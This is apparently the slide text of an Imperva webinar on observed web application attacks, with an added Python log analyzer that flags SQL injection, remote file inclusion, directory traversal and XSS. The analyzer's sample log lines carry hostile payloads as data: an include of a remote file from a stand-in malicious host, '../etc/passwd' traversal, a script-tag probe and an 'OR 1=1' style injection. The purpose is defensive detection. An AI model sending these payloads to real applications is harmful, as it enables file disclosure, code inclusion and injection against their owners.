The State of Application Security: What Hackers Break

Companies of all sizes face a universal security threat from today's organized hacking industry. Why? Hackers are decreasing costs and expanding their reach with tools and technologies that allow for automated attacks against Web applications. The hacker’s arsenal includes armies of zombies (i.e. global networks of compromised computers) that access large amounts of personal and corporate data that can be sold on the black market.

As part of Imperva's ongoing Hacker Intelligence Initiative, we monitored and categorized individual attacks across the Internet over a period of six months. This webinar will detail the results of this research, which encompasses attacks witnessed via onion router (TOR) traffic as well as attacks targeting 30 different enterprise and government Web applications. The research includes:

• Insight into how automation allows hackers to generate 7 attacks per second
• Overview of the top vulnerabilities exploited by hackers: directory traversal, cross-site scripting (XSS), SQL injection, and remote file inclusion (RFI)
• Detail into which countries generate the most malicious activity
• Recommendations, both technical and nontechnical, for security teams and executives

Published in: Technology, News & Politics

The State of Application Security: What Hackers Break

  1. The State of Application Security: What Hackers Break. Amichai Shulman, CTO, Imperva
  2. Agenda
     + The current state of Web vulnerabilities
     + Studying hackers: why?
     + Prioritizing defenses: how?
     + Methodology
     + Analyzing real-life attack traffic: key findings and take-aways
     + Technical recommendations
  3. Imperva Overview. Imperva's mission is simple: protect the data that drives business. The leader in a new category: Data Security. HQ in Redwood Shores, CA; global presence, installed in 50+ countries. 1,200+ direct customers; 25,000+ cloud users:
     + 3 of the top 5 US banks
     + 3 of the top 10 financial services firms
     + 3 of the top 5 telecoms
     + 2 of the top 5 food & drug stores
     + 3 of the top 5 specialty retailers
     + Hundreds of small and medium businesses
  4. Today's Presenter: Amichai Shulman, CTO, Imperva. Speaker at industry events (RSA, Sybase Techwave, Info Security UK, Black Hat). Lecturer on information security at the Technion, Israel Institute of Technology. Former security consultant to banks and financial services firms. Leads the Application Defense Center (ADC), which has discovered over 20 commercial application vulnerabilities, credited by Oracle, MS-SQL, IBM and others. One of InfoWorld's "Top 25 CTOs".
  5. WhiteHat Security Top Ten, 2010: percentage likelihood of a website having at least one vulnerability, sorted by class [chart].
  6. The Situation Today: 357,292,065 websites (estimated, July 2011) × 230 vulnerabilities × 1% ≈ 821,771,600 vulnerabilities in active circulation.
  7. The Situation Today: 357,292,065 websites (estimated, July 2011) × 230 vulnerabilities × 1% ≈ 821,771,600 vulnerabilities in active circulation. But which will be exploited?
  8. Studying Hackers
     Focus on actual threats
     + Focus on what hackers want, helping good guys prioritize
     + Technical insight into hacker activity
     + Business trends of hacker activity
     + Future directions of hacker activity
     Eliminate uncertainties
     + Active attack sources
     + Explicit attack vectors
     + Spam content
     Devise new defenses based on real data
     + Reduce guess work
  9. Understanding the Threat Landscape: Methodology
     Analyze hacker tools and activity
     Tap into hacker forums
     Record and monitor hacker activity
     + Categorized attacks across 30 applications
     + Monitored TOR traffic
     + Recorded over 10M suspicious requests
     + 6 months: December 2010 to May 2011
  10. Lesson #1: Automation is Prevailing. Attacks are automated:
     + Botnets
     + Mass SQL injection attacks
     + Google dorks
  11. Lesson #1: Automation is Prevailing. Tools and kits exist for everything.
  12. Lesson #1: Automation is Prevailing. Apps under automated attack: 25,000 attacks per hour, ≈ 7 per second. On average: 27 attacks per hour, ≈ 1 attack per 2 minutes.
  13. Lesson #1: Automation is Prevailing. Apps under automated attack: 25,000 attacks per hour, ≈ 7 per second. On average: 27 attacks per hour, ≈ 1 attack per 2 minutes. Take-away: get ready to fight automation.
  14. Lesson #2: The “Unfab” Four
  15. Lesson #2A: The “Unfab” Four: SQL Injection
  16. Lesson #2B: The “Unfab” Four: Remote File Inclusion
  17. Lesson #2B: The “Unfab” Four: Remote File Inclusion. Analyzing the parameters and source of an RFI attack enhances common signature-based attack detection.
  18. Lesson #2C: The “Unfab” Four: Directory Traversal
  19. Lesson #2C: The “Unfab” Four: Directory Traversal
  20. Lesson #2D: The “Unfab” Four: Cross Site Scripting
  21. Lesson #2D: The “Unfab” Four: Cross Site Scripting
  22. Lesson #2D: The “Unfab” Four: Cross Site Scripting, zooming into search engine poisoning. http://HighRankingWebSite+PopularKeywords+XSS … http://HighRankingWebSite+PopularKeywords+XSS
  23. Lesson #2D: The “Unfab” Four: Cross Site Scripting. New search engine indexing cycle.
  24. Lesson #2: The “Unfab” Four. Take-away: protect against these common attacks. These may seem obvious, common attacks, but RFI and DT do not even appear in OWASP's top 10 list.
  25. Directory Traversal Missing from OWASP Top 10? OWASP rationale: “Directory traversal is covered in the OWASP Top Ten 2010 through the more general case, A4, Insecure Direct Object Reference.” “Insecure Direct Object Reference” is different from “Directory Traversal” because in the latter access is made to a resource that, to begin with, should not have been available through the application.
  26. Remote File Inclusion Missing from OWASP Top 10? A3 in the OWASP Top 10 2007 was Malicious File Execution; it was removed in the OWASP Top 10 2010. OWASP rationale: “REMOVED: A3 – Malicious File Execution. This is still a significant problem in many different environments. However, its prevalence in 2007 was inflated by large numbers of PHP applications having this problem. PHP now ships with a more secure configuration by default, lowering the prevalence of this problem.”
  27. Lesson #3: The U.S. is the Source of Most Attacks. We witnessed 29% of attack events originating from 10 sources.
  28. Lesson #3: The U.S. is the Source of Most Attacks. We witnessed 29% of attack events originating from 10 sources. Take-away: sort traffic based on reputation.
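As an added example (not code from the webinar, from Imperva, or from the original page), the following Python script applies the two take-aways above to constructed web-server log lines: it flags requests carrying the four attack classes of Lesson #2 (directory traversal, RFI, SQL injection and XSS), using the parameter analysis slide 17 mentions to recognise a remote include by the foreign host it points at, and then ranks source addresses by attack volume, the reputation data Lesson #3 says traffic should be sorted on. The application hostname www.example.com, the regex signatures, the function names and the log lines are all assumptions of the example.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, unquote, urlsplit

# Hostname of the application being protected. Assumed for this example;
# a parameter that points at any other host is treated as a remote include.
OWN_HOST = "www.example.com"

# Constructed sample lines in Apache combined log format. They are not data
# from the webinar; the source addresses are documentation ranges (RFC 5737).
SAMPLE_LOG = """\
203.0.113.5 - - [12/Mar/2011:10:01:02 +0000] "GET /index.php?page=http://malicious.example/x.txt HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [12/Mar/2011:10:01:03 +0000] "GET /download?file=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 404 120 "-" "Mozilla/5.0"
203.0.113.5 - - [12/Mar/2011:10:01:04 +0000] "GET /download?file=%252e%252e%252f%252e%252e%252fetc%252fpasswd HTTP/1.1" 404 120 "-" "Mozilla/5.0"
198.51.100.7 - - [12/Mar/2011:10:02:10 +0000] "GET /search?q=%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1" 200 900 "-" "Mozilla/5.0"
198.51.100.7 - - [12/Mar/2011:10:02:11 +0000] "GET /item?id=1%27%20OR%20%271%27%3D%271 HTTP/1.1" 500 0 "-" "Mozilla/5.0"
192.0.2.9 - - [12/Mar/2011:10:03:00 +0000] "GET /item?id=42 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.0.2.9 - - [12/Mar/2011:10:03:01 +0000] "GET /search?q=cheap+flights HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Deliberately narrow signatures for the four classes, applied to decoded values.
TRAVERSAL_RE = re.compile(r"\.\.[/\\]")
SQLI_RE = re.compile(r"\bunion\b.*\bselect\b|'\s*(or|and)\s+\S+\s*=|\bor\s+1\s*=\s*1\b", re.I)
XSS_RE = re.compile(r"<\s*/?\s*script|javascript:|[\s\"']on[a-z]+\s*=", re.I)
REMOTE_URL_RE = re.compile(r"^(https?|ftp)://", re.I)


def is_remote_include(value: str, own_host: str) -> bool:
    """True when a parameter value is an absolute URL on a foreign host, the
    shape of an RFI attempt. The referenced host is itself useful intelligence."""
    if not REMOTE_URL_RE.match(value):
        return False
    host = (urlsplit(value).hostname or "").lower()
    return host != own_host.lower()


def classify_request(target: str, own_host: str = OWN_HOST) -> set:
    """Return the set of attack classes found in one request target (path plus
    query string). Values are URL-decoded twice so double-encoded payloads such
    as %252e%252e%252f are seen as ../ by the signatures."""
    parts = urlsplit(target)
    candidates = [("<path>", unquote(unquote(parts.path)))]
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        candidates.append((name, unquote(value)))  # parse_qsl already decoded once
    classes = set()
    for name, value in candidates:
        if TRAVERSAL_RE.search(value):
            classes.add("directory_traversal")
        if name != "<path>" and is_remote_include(value, own_host):
            classes.add("rfi")
        if SQLI_RE.search(value):
            classes.add("sqli")
        if XSS_RE.search(value):
            classes.add("xss")
    return classes


def analyze_log(log_text: str, own_host: str = OWN_HOST) -> list:
    """Parse combined-format lines and keep only requests that hit a signature."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed line; a real pipeline would count these separately
        classes = classify_request(m["target"], own_host)
        if classes:
            findings.append({"ip": m["ip"], "ts": m["ts"],
                             "target": m["target"], "classes": sorted(classes)})
    return findings


def rank_sources(findings: list) -> list:
    """Source addresses ordered by number of attack requests: the raw material
    for a reputation list used to sort or rate-limit incoming traffic."""
    return Counter(f["ip"] for f in findings).most_common()


def class_counts(findings: list) -> Counter:
    """How often each of the four classes appeared, for prioritising defenses."""
    return Counter(c for f in findings for c in f["classes"])


if __name__ == "__main__":
    found = analyze_log(SAMPLE_LOG)
    for f in found:
        print(f["ip"], f["ts"], ",".join(f["classes"]), f["target"])
    print("by class:", dict(class_counts(found)))
    print("by source:", rank_sources(found))
```

Run directly, the script lists the five flagged requests, the per-class totals, and the source ranking. Signature matching of this kind is a first filter rather than a verdict: the regexes are intentionally narrow, values are decoded twice only to catch double encoding, and a flagged request should be correlated with the response code and the source's history before the address is added to a block or rate-limit list.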
  29. Organizations like these funded a $27B security market in 2010… …all had major breaches in 2011. What's wrong?
  30. Threat vs. Spending: Market Dislocation
     The data theft industry is estimated at $1 trillion annually
     Organized crime is responsible for 85% of data breaches [1]
     Threats: “In 2010, 76% of all data breached was from servers and applications” [1]
     Spending: “Yet well over 90% of the $27 billion spent on security products was on traditional security” [2]
     [1] 2011 Data Breach Investigations Report (Verizon RISK Team in conjunction with the US Secret Service & Dutch High Tech Crime Unit)
     [2] Worldwide Security Products 2011-2014 Forecast (IDC, February 2011)
  31. Summary
     Deploy security solutions that deter automated attacks
     Detect known vulnerability attacks
     Acquire intelligence on malicious sources and apply it in real time
     Participate in a security community and share data on attacks
  32. Summary. “Foreknowledge cannot be gotten from ghosts and spirits, cannot be had by analogy, cannot be found out by calculation. It must be obtained from people, people who know the conditions of the enemy.” Sun Tzu, The Art of War
  33. Imperva: Our Story in 60 Seconds. Attack Protection, Usage Audit, Virtual Patching, Rights Management, Reputation Controls, Access Control.
  34. Webinar Materials. Get LinkedIn to Imperva Data Security Direct for… answers to attendee questions, post-webinar discussions, the webinar recording link, and much more.
  35. Questions - CONFIDENTIAL -
  36. Thank You
